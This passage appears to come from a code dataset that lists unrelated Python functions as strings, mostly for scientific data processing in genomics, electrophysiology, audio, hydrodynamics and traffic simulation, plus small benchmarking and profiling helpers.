0-9.]+%\\)\\s+Source/(\\S+):(\\S+)\\(.*\\).*$\")\n\n totalCost = 0.0\n functionTable = []\n functionMap = {}\n\n for line in lines:\n line = line.strip()\n match = pattern.match(line)\n if not match:\n continue\n\n cost = float(match.group(1).replace(\",\", \"\"))\n sourceFile = match.group(2)\n function = match.group(3)\n\n # Filter out library code we don't want to change\n if function.startswith(\"stbi__\"):\n continue\n\n totalCost += cost\n\n # Accumulate the scores from functions in multiple call chains\n if function in functionMap:\n index = functionMap[function]\n functionTable[index][1] += cost\n functionTable[index][2] += cost\n # Else add new functions to the end of the table\n else:\n functionMap[function] = len(functionTable)\n functionTable.append([function, cost, cost])\n\n # Sort the table by accumulated cost\n functionTable.sort(key=lambda x: 101.0 - x[2])\n\n for function in functionTable:\n function[2] /= totalCost\n function[2] *= 100.0\n\n with open(outfile, \"w\") as fileHandle:\n\n totals = 0.0\n for function in functionTable:\n # Omit entries less than 1% load\n if function[2] < 1:\n break\n\n totals += function[2]\n fileHandle.write(\"%5.2f%% %s\\n\" % (function[2], function[0]))\n\n fileHandle.write(\"======\\n\")\n fileHandle.write(f\"{totals:5.2f}%\\n\")", "def test_generate_histogram(self):\r\n\r\n # Cannot test content of graphics file, only successful execution\r\n\r\n output_dir = self.output_dir\r\n\r\n # Should not raise an error with good data\r\n generate_histogram(self.qual_fp, output_dir, verbose=False)\r\n\r\n expected_outfile = output_dir + 'quality_scores_plot.pdf'\r\n\r\n self.assertTrue(isfile(expected_outfile))\r\n\r\n # Test text file output for proper data\r\n 
text_output_fp = output_dir + \"quality_bins.txt\"\r\n\r\n text_output_f = open(text_output_fp, \"U\")\r\n\r\n actual_text_output = \"\\n\".join([line.strip()\r\n for line in text_output_f])\r\n\r\n self.assertEqual(actual_text_output, self.expected_output_text_file)", "def build_input_file(self, replica):\n\n file_name = self.inp_basename + \"_\" + \\\n str(replica.id) + \"_\" + \\\n str(replica.cycle) + \".md\"\n\n fo = open(file_name, \"wb\")\n for i in range(1,500):\n fo.write(str(random.randint(i, 500) + i*2.5) + \" \");\n if i % 10 == 0:\n fo.write(str(\"\\n\"));\n fo.close()", "def limit(filename,threshold,makeup,wout=True,plot=False):\n start=time.time()\n n, data, data_dB,sr,ch=inputwav(filename)\n dataL,dataL_bit=compress(filename,threshold,1000.0,makeup,1.0,500.0,wout=False,plot=plot)\n if wout==True:\n print('Exporting...')\n sf.write(filename[0:len(filename)-4]+'_limit.wav',dataL_bit,44100,'PCM_16')\n end=time.time()\n elapsed=int(1000*(end-start))\n print('Done!')\n print('...............................')\n print('Completed in '+str(elapsed)+' milliseconds.') \n return dataL,dataL_bit", "def generatePhasingScore(options,phase,cycle):\n score,readcount,readseq=readDataForPhasingScoreComputation(options,phase)\n phased_loci_filename=options.output_directory_per_run+\"/\"+options.input_filename+\"_\"+str(phase)+\"_\"+str(cycle)+\".positive_phase_loci\"\n final_phase_loci=options.output_directory_per_run+\"/\"+options.input_filename+\"_\"+str(phase)+\"_\"+str(cycle)+\".phasing_score_phase_loci\"\n fhr=open(phased_loci_filename,\"r\")\n out4=open(final_phase_loci,\"w\")\n for line in fhr:\n chromosome,ss,ee=line.strip().split()\n ss=int(ss)\n ee=int(ee)\n #correct=list(range(ss,ee+1,phase))\n phasing_score_filename=options.output_directory_per_run+\"/\"+str(phase)+\"_\"+str(chromosome)+\"_\"+str(ss)+\"_\"+str(ee)+\".phasing_score\"\n abundance_score_filename=options.output_directory_per_run+\"/\"+str(phase)+\"_\"+str(chromosome)+\"_\"+str(ss)+\"_\"+str(ee)+\".abundance\"\n out=open(phasing_score_filename,\"w\")\n out2=open(abundance_score_filename,\"w\")\n score_count={}\n for site in range(ss,ee+1):\n start=site-(phase*4)\n end=site+(phase*5)-1\n max_within_site,max_within_count,all_scores=0,0,0\n for cor in range(start,end+1):\n if cor not in score[chromosome]:continue\n all_scores+=score[chromosome][cor]\n for i in readcount[chromosome][cor]:\n if max_within_count<readcount[chromosome][cor][i]:\n max_within_site=cor\n max_within_count=readcount[chromosome][cor][i]\n all_scores-=max_within_count\n P,k=0,0\n s=start\n while s<end:\n if s not in score[chromosome]:\n s+=phase\n continue\n if score[chromosome][s]!=0:\n P+=score[chromosome][s]\n k+=1\n if s == max_within_site:\n P-=max_within_count \n s+=phase\n U=all_scores-P\n \n #if U<0: continue\n if k>=3:\n #print(P,U,k)\n phas_score=math.log((1+(10*(P/(1+U))))**(k-2))\n \"\"\"if phas_score>max and site in correct:\n max=phas_score\"\"\"\n else:\n phas_score=0\n out.write(str(site)+\"\\t\"+str(phas_score)+\"\\n\")\n out4.write(chromosome+\"\\t\"+str(site)+\"\\t\"+str(phas_score)+\"\\n\")\n if chromosome not in score_count:\n score_count[chromosome]={}\n if site not in score_count[chromosome]:\n score_count[chromosome][site]=phas_score\n if site in readcount[chromosome] and '+' in readcount[chromosome][site] and readcount[chromosome][site]['+']!=0:\n out2.write(str(site)+\"\\t\"+str(readcount[chromosome][site]['+'])+\"\\n\")\n if site in readcount[chromosome] and '-' in readcount[chromosome][site] and 
readcount[chromosome][site]['-']!=0:\n out2.write(str(site)+\"\\t-\"+str(readcount[chromosome][site]['-'])+\"\\n\")\n out.close()\n out2.close()\n \n #out4.write(chromosome+\"\\t\"+str(ss)+\"\\t\"+str(ee)+\"\\t\"+str(phas_score)+\"\\n\")\n out4.close()", "def reduce_and_save():\n ### Get the signature information\n sig_info = pd.read_csv(join(FILE_PATH, \"GSE92742_Broad_LINCS_sig_info.txt\"), sep=\"\\t\")\n ### Columns are:\n ### Index([u'sig_id', u'pert_id', u'pert_iname', u'pert_type', u'cell_id',\n ### u'pert_dose', u'pert_dose_unit', u'pert_idose', u'pert_time',\n ### u'pert_time_unit', u'pert_itime', u'distil_id'],\n ### dtype='object')\n\n ### Filter for signature ids for small molecule pertubagens\n small_mol_sigs = sig_info['sig_id'][sig_info['pert_type'] == \"trt_cp\"]\n ### Results in 205034 signatures\n\n ### Read in the gene info\n gene_info = pd.read_csv(join(FILE_PATH, \"GSE92742_Broad_LINCS_gene_info.txt\"), sep='\\t')\n ### Index([u'pr_gene_id', u'pr_gene_symbol', u'pr_gene_title', u'pr_is_lm',\n ### u'pr_is_bing'],\n ### dtype='object')\n\n landmark_gene_ids = gene_info['pr_gene_id'][gene_info['pr_is_lm'] == 1] #Filters for directly measured transcripts\n ### Results in the 978 landmark pr_gene_ids\n\n ### LOAD in the main file filtering the columns so that only the small molecules signatures are loaded and the\n ### rows such that only the landmark genes are loaded into their custom gctoo container type\n relevent_sigs_gctoo = parse(join(FILE_PATH, \"GSE92742_Broad_LINCS_Level5_COMPZ.MODZ_n473647x12328.gctx\"),\n cid=small_mol_sigs, rid=landmark_gene_ids)\n # print small_mol_sigs.data_df.shape\n ### Should write an intermediate file with dimensions (978, 205034)\n write_gctx.write(relevent_sigs_gctoo, join(FILE_PATH, \"lm_sm_aggz\"))", "def gen_fps():\n global data_src ,output_dir \n logger = TaskFileLogger(\"GenFP\")\n\n h_vars = load_hydro_var()\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\n for h_type,var_d in h_vars.items():\n print \"considering %s\" %h_type\n\n t_output_dir = os.path.join(output_dir,h_type)\n if not os.path.exists(t_output_dir):\n print \"creating path %s\" %t_output_dir\n os.mkdir(t_output_dir)\n logger.log(\"%s started\" %(h_type))\n\n for fname in glob.glob(data_src):\n complex_id = os.path.basename(fname).split('.')[0] \n fp_path = os.path.join(t_output_dir,complex_id + \".fp\" )\n if os.path.exists(fp_path):\n #print \"%s processed\" %complex_id\n continue\n print \"processing %s,fp saved as %s\" %(fname , fp_path )\n c = Complex(fname,hydro_dict = var_d)\n c.get_fp()\n c.write_fp_to_file(fp_path)\n\n logger.log(\"%s finished\" %(h_type))", "def output_mb(self):\n total_output_size = sum([t.shuffle_mb_written for t in self.tasks])\n return total_output_size", "def processfile(file, out, me):\n if out.endswith('.npz'):\n out = out[:-4]\n out = out + ('-%03d' % me) + '.npz'\n if os.path.exists(out):\n return\n f = QPM.QPMSubsampleFile(file)\n xis = []\n mybf = QPM.LogWindowBiasFunction(edges[me], edges[me + 1])\n mymock = QPM.halomock(f, 1e6, mybf, continuous=False)\n for i in range(me + 1):\n bf = QPM.LogWindowBiasFunction(edges[i], edges[i + 1])\n mock = QPM.halomock(f, 1e6, bf, continuous=False)\n # the error is nonsense since we have just one sample\n # deal with it in combine\n xi = QPM.xi([mock], mocks2=[mymock])\n r = xi[0]\n xis.append(xi[1])\n print edges[i], edges[i + 1], len(mock[0]), mock[1].sum()\n numpy.savez(out, r=r, xi=xis, edges=edges, N=1e6, me=me)", "def createOutput():\n\n firstPeriod = True\n # get edge No\n 
edgesNo = 0\n edgesSet = set()\n for timestep, taxiList in vtypeDict.iteritems():\n for tup in taxiList:\n edgesSet.add(tup[1])\n edgesNo = len(edgesSet)\n\n outputFile = open(path.FQoutput, 'w')\n outputFile.write('<?xml version=\"1.0\"?>\\n')\n outputFile.write('<paramEffects aggregationInterval=\"%d\" vehicles=\"%d\" edges=\"%d\">\\n' % (\n aggInterval, vehSum, edgesNo))\n for period, quota, vtypeDictR, taxiSum in generatePeriodQuotaSets(True):\n if quota is None:\n if not firstPeriod:\n outputFile.write(\"\\t</periods>\\n\")\n else:\n firstPeriod = False\n outputFile.write('\\t<periods period=\"%d\">\\n' % (period))\n else:\n simpleTaxiMeanVList = [0, 1]\n simpleEdgeMeanVList = [0, 1]\n drivenEdgesSet = set()\n\n if len(vtypeDictR) == 0: # if the processed FCD returns no Values\n print(\"noData p\", period, \" q\", quota)\n drivenEdgesSet.add(0)\n else: # create mean from all taxi speed values\n for timestep, taxiList in vtypeDictR.iteritems():\n for tup in taxiList: # all elements in this timestep\n simpleTaxiMeanVList[0] += tup[2]\n simpleTaxiMeanVList[1] += 1\n drivenEdgesSet.add(tup[1])\n # create mean from all edge speed values which are driven by the\n # chosen taxis\n drivenEdgesList = list(drivenEdgesSet)\n drivenEdgesList.sort()\n # print \"dataSets \",simpleTaxiMeanVList[1]\n\n # --edgeDump-- #\n \"\"\"\n for i in edgeDumpDict.keys(): #all intervals\n for edge,v in edgeDumpDict[i]:\n if BinarySearch.isElmInList(drivenEdgesList,edge):\n simpleEdgeMeanVList[0]+=v\n simpleEdgeMeanVList[1]+=1\n \"\"\"\n # --vtype-- #\n\n for timestep, taxiList in vtypeDict.iteritems():\n for tup in taxiList:\n if BinarySearch.isElmInList(drivenEdgesList, tup[1]):\n simpleEdgeMeanVList[0] += tup[2]\n simpleEdgeMeanVList[1] += 1\n\n # calc values for output\n detectedEdges = len(drivenEdgesSet)\n relDetectedEdges = detectedEdges * 100.0 / edgesNo\n vSim = simpleEdgeMeanVList[0] / simpleEdgeMeanVList[1]\n vSimFCD = simpleTaxiMeanVList[0] / simpleTaxiMeanVList[1]\n vAbsDiff = vSimFCD - vSim\n if vSim != 0:\n vRelDiff = vAbsDiff / vSim * 100\n else:\n vRelDiff = 100\n if vRelDiff < -40:\n vRelDiff = -35\n\n outputFile.write('\\t\\t<values taxiQuota=\"%f\" taxis=\"%d\" simMeanSpeed=\"%f\" simFcdMeanSpeed=\"%f\" ' % (\n quota, taxiSum, vSim, vSimFCD,))\n outputFile.write('detectedEdges=\"%d\" notDetectedEdges=\"%d\" ' % (\n detectedEdges, edgesNo - detectedEdges))\n outputFile.write('absSpeedDiff=\"%f\" relSpeedDiff=\"%f\" relDetectedEdges=\"%f\" relNotDetectedEdges=\"%f\"/>\\n' %\n (vAbsDiff, vRelDiff, relDetectedEdges, 100 - relDetectedEdges))\n outputFile.write(\"\\t</periods>\\n</paramEffects>\")\n outputFile.close()", "def run_reduce(self):\n from histogram import add_and_save\n root_file = TFile(self.args.output, \"RECREATE\")\n add_and_save(self.output, root_file)\n root_file.Write()\n root_file.Close()", "def log_file1D(fast5_data , basecall_stat):\n\n version, flowcell_id, hostname, numMinion, run_id = fast5_data\n\n #Retrieve the dataframe with statitstics such as the quartile or std\n #Retrieve the dictionary from albacore summary log\n\n num_called_template, mean_qscore_template = basecall_stat.stat_generation()\n\n counter_template, total_nucleotide_template = basecall_stat.counter()\n\n occupancy_pore = basecall_stat.occupancy_pore()\n\n completeName = os.path.join('/home/ferrato/Documents/fast5', \"fichier_aozan.txt\")\n\n with open(completeName, 'w') as file_data:\n\n for index, element in num_called_template.iteritems():\n file_data.write(\"num.called.template.{}={}\\n\".format(index, 
element))\n\n for index, element in num_called_template.iteritems():\n file_data.write(\"mean.qscore.template.{}={}\\n\".format(index, element))\n\n for nucleotide, count in counter_template.items():\n file_data.write(\"nucleotide.{}.template={}\\n\".format(nucleotide,count))\n if nucleotide == 'total':\n continue\n calcul = float(count) / float(total_nucleotide_template)\n file_data.write(\"nucleotide.{}.proportion={}\\n\".format(nucleotide, calcul))\n\n\n file_data.write(\"total.number.of.sequence={}\\n\".format(basecall_stat.fast5_tot))\n\n for index, value in occupancy_pore.items():\n file_data.write(\"pore.occupancy.{}={}\\n\".format(index, value))\n\n\n file_data.write(\"flowcell.serial.number={}\\n\".format(flowcell_id))\n file_data.write(\"minknown.version={}\\n\".format(version))\n file_data.write(\"hostname={}\\n\".format(hostname))\n file_data.write(\"minion.serial.number={}\\n\".format(numMinion))\n file_data.write((\"run.id={}\\n\".format(run_id)))\n\n for index, element in basecall_stat.statistics_read_size().iteritems():\n file_data.write(\"Read.fastq.length.{}={}\\n\".format(index, element))", "def constructReadCountsStr(samplesList, resultsPath, outRoot, stype):\n files = []\n for i in range(len(samplesList)):\n files.append(os.path.join(resultsPath, outRoot) + \".\" + stype + \".\" + str(i) + \".pruned.te-counts.txt\")\n return \",\".join(files)", "def psd_estimate(src_file, type):\n\n #Open file\n with NWBHDF5IO(src_file, mode='r+', load_namespaces=True) as io:\n nwb = io.read()\n\n #Source ElectricalSeries\n if type=='raw':\n data_obj = nwb.acquisition['ElectricalSeries']\n elif type=='preprocessed':\n data_obj = nwb.processing['ecephys'].data_interfaces['LFP'].electrical_series['preprocessed']\n\n nChannels = data_obj.data.shape[1]\n nSamples = data_obj.data.shape[0]\n fs = data_obj.rate\n #Welch - window length as power of 2 and keeps dF~0.05 Hz\n dF = .05 #Frequency bin size\n win_len_welch = 2**(np.ceil(np.log2(fs/dF)).astype('int')) #dF = fs/nfft\n #FFT - using a power of 2 number of samples improves performance\n nfft = int(2**(np.floor(np.log2(nSamples)).astype('int')))\n fx_lim = 200.\n for ch in np.arange(nChannels): # Iterate over channels\n trace = data_obj.data[:, ch]\n fx_w, py_w = sgn.welch(trace, fs=fs, nperseg=win_len_welch)\n fx_f, py_f = sgn.periodogram(trace, fs=fs, nfft=nfft)\n #saves PSD up to 200 Hz\n py_w = py_w[fx_w < fx_lim]\n fx_w = fx_w[fx_w < fx_lim]\n py_f = py_f[fx_f < fx_lim]\n fx_f = fx_f[fx_f < fx_lim]\n if ch==0:\n PY_welch = py_w.reshape(-1,1)\n PY_fft = py_f.reshape(-1,1)\n else:\n PY_welch = np.append(PY_welch, py_w.reshape(-1,1), axis=1)\n PY_fft = np.append(PY_fft, py_f.reshape(-1,1), axis=1)\n\n #Electrodes\n elecs_region = nwb.electrodes.create_region(name='electrodes',\n region=np.arange(nChannels).tolist(),\n description='all electrodes')\n\n #PSD shape: ('frequency', 'channel')\n spectrum_module_welch = Spectrum(name='Spectrum_welch_'+type,\n frequencies=fx_w,\n power=PY_welch,\n source_timeseries=data_obj,\n electrodes=elecs_region)\n\n spectrum_module_fft = Spectrum(name='Spectrum_fft_'+type,\n frequencies=fx_f,\n power=PY_fft,\n source_timeseries=data_obj,\n electrodes=elecs_region)\n \n # Processing module\n try: # if ecephys module already exists\n ecephys_module = nwb.processing['ecephys']\n except: # creates ecephys ProcessingModule\n ecephys_module = ProcessingModule(name='ecephys',\n description='Extracellular electrophysiology data.')\n # Add module to NWB file\n nwb.add_processing_module(ecephys_module)\n 
print('Created ecephys')\n ecephys_module.add_data_interface(spectrum_module_welch)\n ecephys_module.add_data_interface(spectrum_module_fft)\n\n io.write(nwb)\n print('Spectrum_welch_'+type+' added to file.')\n print('Spectrum_fft_'+type+' added to file.')", "def convert_calculations(filename, hdf5_data):\n x1 = []\n\n with open(filename, 'r') as inp:\n for line in inp:\n x1.append(line)\n\n idx = 1\n dset = require_dataset(hdf5_data, structure.H5_ENV_VOLUME, (1,), dtype=settings.NEMOH_FLOAT)\n dset[0] = float(x1[idx].split()[0])\n set_hdf5_attributes(dset, structure.H5_ENV_VOLUME_ATTR)\n idx += 1\n\n dset = require_dataset(hdf5_data, structure.H5_ENV_GRAVITY, (1,), dtype=settings.NEMOH_FLOAT)\n dset[0] = float(x1[idx].split()[0])\n set_hdf5_attributes(dset, structure.H5_ENV_GRAVITY_ATTR)\n idx += 1\n\n\n dset = require_dataset(hdf5_data, structure.H5_ENV_DEPTH, (1,), dtype=settings.NEMOH_FLOAT)\n dset[0] = float(x1[idx].split()[0])\n set_hdf5_attributes(dset, structure.H5_ENV_DEPTH_ATTR)\n idx += 1\n\n dset = require_dataset(hdf5_data, structure.H5_ENV_WAVE_POINT, (2,), dtype=settings.NEMOH_FLOAT)\n x2 = x1[idx].split()\n dset[0] = float(x2[0])\n dset[1] = float(x2[1])\n set_hdf5_attributes(dset, structure.H5_ENV_WAVE_POINT_ATTR)\n\n idx = 6\n\n num_bodies = int(x1[idx].split()[0])\n\n for i in range(num_bodies):\n\n body = structure.H5_BODIES + structure.H5_BODY_BASE + str(i+1) + '/'\n idx += 2\n\n mesh_x = []\n\n mesh_path = os.path.join(os.path.abspath(os.path.dirname(filename)), str(x1[idx].split()[0]).strip(' \\t\\n\\r'))\n\n with open(mesh_path, 'r') as mesh_file:\n for line in mesh_file:\n mesh_x.append(line)\n\n idx += 1\n x2 = x1[idx].split()\n\n num_points = int(x2[0])\n num_panels = int(x2[1])\n dset = require_dataset(hdf5_data, body + structure.H5_BODY_NUM_POINTS, (1, ), dtype=settings.NEMOH_INT)\n dset[0] = num_points\n set_hdf5_attributes(dset, structure.H5_BODY_NUM_POINTS_ATTR)\n\n dset = require_dataset(hdf5_data, body + structure.H5_BODY_NUM_PANELS, (1, ), dtype=settings.NEMOH_INT)\n dset[0] = num_panels\n set_hdf5_attributes(dset, structure.H5_BODY_NUM_PANELS_ATTR)\n\n mesh_idx = 0\n dset = require_dataset(hdf5_data, body + structure.H5_BODY_MESH, (num_points+num_panels+1, 4), dtype=settings.NEMOH_FLOAT)\n mesh_x2 = mesh_x[mesh_idx].split()\n set_hdf5_attributes(dset, structure.H5_BODY_MESH_ATTR)\n\n dset[0, 0] = int(mesh_x2[0])\n dset[0, 1] = int(mesh_x2[1])\n\n for j in range(1, num_points+num_panels+1):\n mesh_idx += 1\n mesh_x2 = mesh_x[mesh_idx].split()\n dset[j, :] = [float(x) for x in mesh_x2[:4]]\n\n if j == num_points:\n mesh_idx += 1\n\n idx += 1\n num = int(x1[idx].split()[0])\n dset = require_dataset(hdf5_data, body + structure.H5_FREEDOM_DEGREE, (num, 7), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_FREEDOM_DEGREE_ATTR)\n for j in range(num):\n idx += 1\n x2 = x1[idx].split()\n dset[j, :] = np.array([float(x) for x in x2[:7]])\n\n idx += 1\n num = int(x1[idx].split()[0])\n dset = require_dataset(hdf5_data, body + structure.H5_GENERALISED_FORCES, (num, 7), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_GENERALISED_FORCES_ATTR)\n for j in range(num):\n idx += 1\n x2 = x1[idx].split()\n dset[j, :] = [float(x) for x in x2[:7]]\n\n idx += 1\n num = int(x1[idx].split()[0])\n for j in range(num):\n idx += 1\n\n idx += 2\n x2 = x1[idx].split()\n\n dset = require_dataset(hdf5_data, structure.H5_NUM_WAVE_FREQUENCIES, (1,), dtype=settings.NEMOH_INT)\n set_hdf5_attributes(dset, structure.H5_NUM_WAVE_FREQUENCIES_ATTR)\n 
dset[0] = int(x2[0])\n dset = require_dataset(hdf5_data, structure.H5_MIN_WAVE_FREQUENCIES, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_MIN_WAVE_FREQUENCIES_ATTR)\n dset[0] = float(x2[1])\n dset = require_dataset(hdf5_data, structure.H5_MAX_WAVE_FREQUENCIES, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_MAX_WAVE_FREQUENCIES_ATTR)\n dset[0] = float(x2[2])\n idx += 1\n x2 = x1[idx].split()\n dset = require_dataset(hdf5_data, structure.H5_NUM_WAVE_DIRECTIONS, (1,), dtype=settings.NEMOH_INT)\n set_hdf5_attributes(dset, structure.H5_NUM_WAVE_DIRECTIONS_ATTR)\n dset[0] = int(x2[0])\n\n dset = require_dataset(hdf5_data, structure.H5_MIN_WAVE_DIRECTIONS, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_MIN_WAVE_DIRECTIONS_ATTR)\n dset[0] = float(x2[1])\n\n dset = require_dataset(hdf5_data, structure.H5_MAX_WAVE_DIRECTIONS, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_MAX_WAVE_DIRECTIONS_ATTR)\n dset[0] = float(x2[2])\n\n idx += 2\n x2 = x1[idx].split()\n\n dset = require_dataset(hdf5_data, structure.H5_COMPUTE_IRF, (1,), dtype=settings.NEMOH_INT)\n set_hdf5_attributes(dset, structure.H5_COMPUTE_IRF_ATTR)\n dset[0] = int(x2[0])\n\n dset = require_dataset(hdf5_data, structure.H5_IRF_TIME_STEP, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_IRF_TIME_STEP_ATTR)\n dset[0] = float(x2[1])\n dset = require_dataset(hdf5_data, structure.H5_IRF_DURATION, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_IRF_DURATION_ATTR)\n dset[0] = float(x2[2])\n\n idx += 1\n x2 = x1[idx].split()\n dset = require_dataset(hdf5_data, structure.H5_SHOW_PRESSURE, (1,), dtype=settings.NEMOH_INT)\n set_hdf5_attributes(dset, structure.H5_SHOW_PRESSURE_ATTR)\n dset[0] = int(x2[0])\n\n idx += 1\n x2 = x1[idx].split()\n dset = require_dataset(hdf5_data, structure.H5_KOCHIN_NUMBER, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_KOCHIN_NUMBER_ATTR)\n dset[0] = float(x2[0])\n dset = require_dataset(hdf5_data, structure.H5_KOCHIN_MIN, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_KOCHIN_MIN_ATTR)\n dset[0] = float(x2[1])\n dset = require_dataset(hdf5_data, structure.H5_KOCHIN_MAX, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_KOCHIN_MAX_ATTR)\n dset[0] = float(x2[2])\n\n\n idx += 1\n x2 = x1[idx].split()\n dset = require_dataset(hdf5_data, structure.H5_FREE_SURFACE_POINTS_X, (1,), dtype=settings.NEMOH_INT)\n set_hdf5_attributes(dset, structure.H5_FREE_SURFACE_POINTS_X_ATTR)\n dset[0] = int(x2[0])\n dset = require_dataset(hdf5_data, structure.H5_FREE_SURFACE_POINTS_Y, (1,), dtype=settings.NEMOH_INT)\n set_hdf5_attributes(dset, structure.H5_FREE_SURFACE_POINTS_Y_ATTR)\n dset[0] = int(x2[1])\n dset = require_dataset(hdf5_data, structure.H5_FREE_SURFACE_DIMENSION_X, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_FREE_SURFACE_DIMENSION_X_ATTR)\n dset[0] = float(x2[2])\n dset = require_dataset(hdf5_data, structure.H5_FREE_SURFACE_DIMENSION_Y, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_FREE_SURFACE_DIMENSION_Y_ATTR)\n dset[0] = float(x2[3])", "def process_stat_files(param):\n\n #get the files that are actually in the output directory\n call = ['cp', '-R']\n call.append(param['working_dir']+'results/featureCount/')\n call.append(param['working_dir']+'report/')\n _, _ = subprocess.Popen(call,\n stdout=subprocess.PIPE,\n 
stderr=subprocess.PIPE).communicate()\n\n featurecount_file = (param['working_dir']+\n 'results/featureCount/featureCount_stats.txt')\n #extract table\n table = []\n filehandle = open(featurecount_file)\n #header\n table.append(filehandle.readlines()[0].rstrip().split('\\t'))\n table[0] = table[0][1:]\n filehandle.close()\n\n #total number of aligned reads\n tot_reads = param['bam_qc']['unique_aligned_reads']\n counter = [0] * len(param['bam_qc']['unique_aligned_reads'])\n \n filehandle = open(featurecount_file)\n for line in filehandle.readlines()[1:]:\n cur_line = line.rstrip().split('\\t')\n cur_line[0] = re.sub(r'_',' ',cur_line[0])\n if cur_line[0] not in ['Unassigned MultiMapping','Assigned']:\n counter = [ct + int(cr) for ct, cr in zip(counter, cur_line[1:])]\n perc = ([cur_line[0]]+\n MODULE_HELPER.get_percentage(cur_line[1:],\n tot_reads,\n len(cur_line)-1))\n table.append(perc)\n filehandle.close()\n assigned = [tot_reads[idx] - counter[idx] for idx in range(len(tot_reads))]\n perc = ['Assigned'] + MODULE_HELPER.get_percentage(assigned,\n tot_reads,\n len(counter))\n return table", "def write_gct_file(output_file, class_names, class_counts, expression_matrix):\n total_genes = len(expression_matrix)\n first_key = list(expression_matrix.keys())[0]\n total_samples = len(expression_matrix[first_key])\n\n headers = ['NAME', 'DESCRIPTION']\n\n for c_name, c_count in zip(class_names, class_counts):\n for i in range(c_count):\n headers.append('{}_{}'.format(c_name, i + 1))\n\n with open(output_file, 'w') as f:\n f.write('#1.2\\n')\n f.write('{} {}\\n'.format(total_genes, total_samples))\n f.write('\\t'.join(headers))\n f.write('\\n')\n\n for g_name, values in expression_matrix.items():\n f.write(g_name)\n f.write('\\tna\\t')\n f.write('\\t'.join(\n ['{0:.2f}'.format(v) for v in values]\n ))\n f.write('\\n')", "def generate_encryption_statistics():\n print(\"\\nGeneration of the encryption statistics:\")\n\n # Password\n password = 'password'\n\n # The table of the results\n results = []\n\n # For every filesize, generate the file\n for key in FILESIZES:\n results.append(\n cipher_execution(\n '-c',\n DATASET_DIR+key+DATASET_EXTENSION,\n DATASET_DIR+key+CIPHERED_EXTENSION,\n password\n )\n )\n\n line_chart = pygal.Line()\n line_chart.title = 'Execution time of encryption in sequential mode'\n line_chart.x_title = 'Size of input file'\n line_chart.x_labels = FILESIZES\n line_chart.y_title = 'Execution time in seconds'\n line_chart.add('Time', results)\n line_chart.render_to_png(REPORT_DIR+'encryption_sequential.png')", "def __convert_file_size(self, file_size:float)->float:\n return file_size * 1000000", "def main(output_file):\n with open(output_file, 'w+') as fl:\n poor_perf_stats = pstats.Stats('poor_perf.log', stream=fl)\n good_perf_stats = pstats.Stats('good_perf.log', stream=fl)\n\n poor_perf_stats.sort_stats('cumtime')\n\n fl.write('--------------------------------------------\\n')\n fl.write('POOR PERFORMANCE STATS\\n')\n fl.write(f\"Time: {poor_perf_stats.total_tt}\\n\")\n fl.write(f\"Function Calls: {poor_perf_stats.total_calls}\\n\")\n fl.write(f\"Top cumulative times\\n\")\n poor_perf_stats.print_stats(20)\n\n fl.write('--------------------------------------------\\n')\n fl.write('GOOD PERFORMANCE STATS\\n')\n fl.write(f\"Time: {good_perf_stats.total_tt}\\n\")\n fl.write(f\"Function Calls: {good_perf_stats.total_calls}\\n\")\n fl.write(f\"Top 20 cumulative times\\n\")\n good_perf_stats.print_stats(20)", "def process(cline, rline, file1, file2, file3, library_sizes):\n cparts = 
cline.split(\"\\t\")\n rparts = rline.split(\"\\t\")\n\n # confirm that the two lines being processed are for the same locus\n assert(cparts[0] == rparts[0] and cparts[1] == rparts[1])\n\n # split first column (locus) into three columns containing its\n # consituent parts (chromosome, start base, and end base)\n chr = rparts[0].split(\":\")[0]\n start = rparts[0].split(\":\")[1].split(\"-\")[0]\n end = rparts[0].split(\":\")[1].split(\"-\")[1]\n\n line1 = [chr, start, end] + rparts[1:] + cparts[2:] # counts in reads\n line2 = [chr, start, end] + rparts[1:] + [cparts[2]] # counts in rpm\n line3 = [chr, start, end] + rparts[1:] + [cparts[2]] # counts in rpkm\n\n gene_length = int(rparts[2])\n\n for i in range(3, len(cparts)):\n\n index = i - 3\n lib_size = library_sizes[index][1]\n\n mapped_reads = int(cparts[i])\n\n if lib_size == 0: # Prevent DIVBYZERO error\n rpm = 0\n rpkm = 0\n elif gene_length == 0:\n rpkm = 0\n else:\n rpm = ((mapped_reads * (10 ** 6)) / lib_size)\n rpkm = ((mapped_reads * (10 ** 9)) / (lib_size * gene_length))\n\n line2 += [str(rpm)]\n line3 += [str(rpkm)]\n\n out1 = \"\\t\".join(line1) + \"\\n\"\n out2 = \"\\t\".join(line2) + \"\\n\"\n out3 = \"\\t\".join(line3) + \"\\n\"\n\n file1.write(out1)\n file2.write(out2)\n file3.write(out3)", "def estimateOutputSize(scriptSize):\n return 8 + 2 + wire.varIntSerializeSize(scriptSize) + scriptSize", "def chunk(wb_run,sample_run,ei_guess,rebin,mapingfile,nchunk,**kwargs):\n global reducer,rm_zero,inst_name,van_mass,bleed_switch,rate,pixels\n print 'DGreduce run for ',inst_name,'run number ',sample_run\n try:\n n,r=lhs('both')\n wksp_out=r[0]\n except:\n if sample_run == 0:\n #deal with the current run being parsed as 0 rather than 00000\n sample_run='00000'\n wksp_out=inst_name+str(sample_run)+'.spe'\n if kwargs.has_key('sum') and kwargs.get('sum')==True:\n wksp_out=inst_name+str(sample_run[0])+'sum'+'.spe'\n \n start_time=time.time()\n \n if sample_run=='00000' and mtd.doesExist(inst_name+'00000.raw')==True:\n print 'Deleteing previous instance of temp data'\n 